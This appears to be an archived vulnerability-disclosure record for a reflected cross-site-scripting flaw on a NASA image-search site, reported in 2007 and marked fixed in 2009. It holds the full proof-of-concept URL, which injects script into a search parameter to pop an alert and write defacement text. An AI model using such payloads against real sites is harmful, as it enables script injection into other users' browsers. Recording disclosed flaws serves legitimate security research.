Security researcher xRoot, has submitted on 18/02/2007 a cross-site-scripting (XSS) vulnerability affecting images.jsc.nasa.gov, which at the time of submission ranked 652 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/02/2007. It is currently fixed. |
Date submitted: 18/02/2007 |
Date published: 18/02/2007 |
Date fixed: 23/01/2009 | Status: FIXED |
Author: xRoot |
Domain: images.jsc.nasa.gov |
Category: XSS |
Pagerank: 652 |
URL: http://images.jsc.nasa.gov/search/search.cgi?textsearch=Go&hitsperpage=5&submit.x=7&submit.y=8&submi t=submit&keywords=%3Cscript%3Ealert%28%22xRoot+Rulezzz%22%29%3B+document.write%28%22%3Cbr%3E+%3Cbr%3 Enasa%20sux%20=]%21+%3Cbr%3E+%3Cbr%3E%3Cbr%3E+%3Cbr%3E%3Cbr%3E+%3Cbr%3E%3Cbr%3E+%3Cbr%3E+%22%29%3C%2 Fscript%3E%3C%2Fb%3E%3Cp%3ExRoot%20group%3C%2Fp%3E |
Click here to view the mirror
|
|
|